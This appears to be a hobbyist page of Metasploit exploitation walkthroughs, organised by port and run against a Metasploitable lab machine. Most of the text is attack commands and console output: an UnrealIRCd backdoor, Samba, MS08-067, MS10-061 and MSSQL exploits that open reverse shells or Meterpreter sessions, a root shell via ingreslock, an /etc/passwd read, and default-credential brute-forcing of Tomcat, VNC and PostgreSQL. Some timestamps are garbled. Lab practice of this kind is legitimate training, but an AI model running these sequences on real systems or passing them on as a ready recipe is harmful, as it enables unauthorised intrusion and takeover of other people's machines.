.::Tools[K]id::.: Exploits

port 6667 - Unreal ircd (win/linux)

port 1524 - ingreslock (linux)

port 8180 - tomcat_mgr_login (win/linux)

port 139 - (linux)

port 139/445 - (linux)

port 445 - (linux)

port 135 - msrpc (win)

port 445 - microsoft-ds (win)

port 1433 - ms-sql-s (win)

port 5900 - vnc (win/linux)

port 5432 - postgresql (linux)

port 25 - smtp

port 3306 - mysql (linux)

port 21 - FTP (linux)

exploits bellow tested with backtrack 5r1

----------------------------------------------------------------------------------

port 6667 - Unreal ircd (win/linux)

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd

| irc-info: Server: irc.Metasploitable.LAN

| Version: Unreal3.2.8.1. irc.Metasploitable.LAN

| Lservers/Lusers: 0/1

| Uptime: 0 days, 0:04:32

|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address

msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.1.20:6667...

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo ahaBucJmQvi2ONTC;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "ahaBucJmQvi2ONTC\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

----------------------------------------------------------------------------------

port 1524 - ingreslock (linux)

1524/tcp open ingreslock?

The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@bt# telnet 192.168.1.20 1524

Trying 192.168.1.20...

Connected to 192.168.1.20.

Escape character is '^]'.

root@test:/# id

uid=0(root) gid=0(root) groups=0(root)

----------------------------------------------------------------------------------

port 8180 - tomcat_mgr_login (win/linux)

msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > set rport 8180

msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address

msf auxiliary(tomcat_mgr_login) > run

[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'

[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

----------------------------------------------------------------------------------

port 139 - (linux)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment

--------- -------

METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master

--------- -------

WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 139/445 - (linux)

samba "username map script" command execution

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set rhost Remote-IP-Addres

msf exploit(usermap_script) > set lhost Local-IP-Address

msf exploit(usermap_script) > set rport 139 or 445 (both will work)

msf exploit(usermap_script) > set payload cmd/unix/reverse

msf exploit(usermap_script) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo AGo0tmuVPzZXPNPw;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "AGo0tmuVPzZXPNPw\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100

----------------------------------------------------------------------------------

port 445 - (linux)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment

--------- -------

METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master

--------- -------

WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 135 - msrpc (win)

msf > use exploit/windows/dcerpc/ms03_026_dcom

msf exploit(ms03_026_dcom) > set lhost IP-Address

msf exploit(ms03_026_dcom) > set rhost IP-Address

msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on IP-Address:4444

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...

[*] Sending exploit ...

----------------------------------------------------------------------------------

port 445 - microsoft-ds (win)

use windows/smb/ms08_067_netapi

set rhost 192.168.0.200

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.1

exploit

[*] Started reverse handler on 192.168.0.1:4444

[*] Automatically detecting the target…

[*] Fingerprint: Windows XP – Service Pack 3 – lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability…

[*] Sending stage (749056 bytes) to 192.168.0.200

[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done you need to open the console by typing the bellow after the >

meterpreter > execute -f cmd.exe -c

Process 1120 created.

Channel 1 created.

meterpreter > interact 1

Interacting with channel 1…

Microsoft Windows XP

myexploit.wordpress.com/control-smb-445-137-139/

And local printer exploit

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability

Module: exploit/windows/smb/ms10_061_spoolss

Version: 13208

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

jduck

hdm

Available targets:

Id Name

-- ----

0 Windows Universal

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PNAME no The printer share name to use on the target

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE spoolss no The named pipe for the spooler service

Payload information:

Space: 1024

Avoid: 0 characters

Description:

This module exploits the RPC service impersonation vulnerability

detailed in Microsoft Bulletin MS10-061. By making a specific DCE

RPC request to the StartDocPrinter procedure, an attacker can

impersonate the Printer Spooler service to create a file. The

working directory at the time is %SystemRoot%\system32. An attacker

can specify any file name, including directory traversal or full

paths. By sending WritePrinter requests, an attacker can fully

control the content of the created file. In order to gain code

execution, this module writes to a directory used by Windows

Management Instrumentation (WMI) to deploy applications. This

directory (Wbem\Mof) is periodically scanned and any new .mof files

are processed automatically. This is the same technique employed by

the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse handler on Local-IP-Address:4444

[*] Trying target Windows Universal...

[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...

[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...

[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...

[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036

[*] Job started: 0x2

[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe

[*] Job started: 0x3

[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof

[*] Everything should be set, waiting for a session...

[*] Sending stage (752128 bytes) to Remote-IP-Address

[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000

meterpreter >

----------------------------------------------------------------------------------

port 1433 - ms-sql-s (win)

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address

lhost => IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address

rhost => IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444

[*] Attempting automatic target detection...

[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"

[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8

[*] Sending stage (752128 bytes) to IP-Address

[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

----------------------------------------------------------------------------------

port 5900 - vnc (win/linux)

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST

Nmap scan report for IP-Address

Host is up (0.00054s latency).

PORT STATE SERVICE

5900/tcp open vnc

| vnc-info:

| Protocol version: 3.3

| Security types:

|_ Unknown security type (33554432)

MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

msf > use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt

msf auxiliary(vnc_login) > set rhosts IP-Address

msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3

msf auxiliary(vnc_login) > run

[*] IP-Address:5900 - Starting VNC login sweep

[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''

[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3

[-] IP-Address:5900 VNC - [01/18] - , Authentication failed

[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'

[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3

[+] IP-Address:5900, VNC server password : "password"

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

2. Open vncviewer or tsclient

root@bt:~# vncviewer ip-address:5900

root@bt:~# tsclient

Computer = IP-Address

Protocol = VNC

Username = leave blank

Press connect

3. A Password box will open type in password press enter.

port 8180 - tomcat_mgr_login (win/linux)

----------------------------------------------------------------------------------

port 5432 - postgresql (linux)

root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST

Nmap scan report for Remote-IP-Address

Host is up (0.00045s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

MAC Address: 01:02:03:04:05:06 (Micky Systems)

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

msf > search PostgreSQL

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query

auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query

auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility

auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe

exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution

msf > use auxiliary/scanner/postgres/postgres_login

msf auxiliary(postgres_login) > set rhosts Remote-IP-Address

msf auxiliary(postgres_login) > exploit

[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''

[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''

[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''

[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''

[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'

[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'

[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

[*] Remote-IP-Address:5432 Postgres - Disconnected

[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'

[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'

[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'

[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'

[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'

[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'

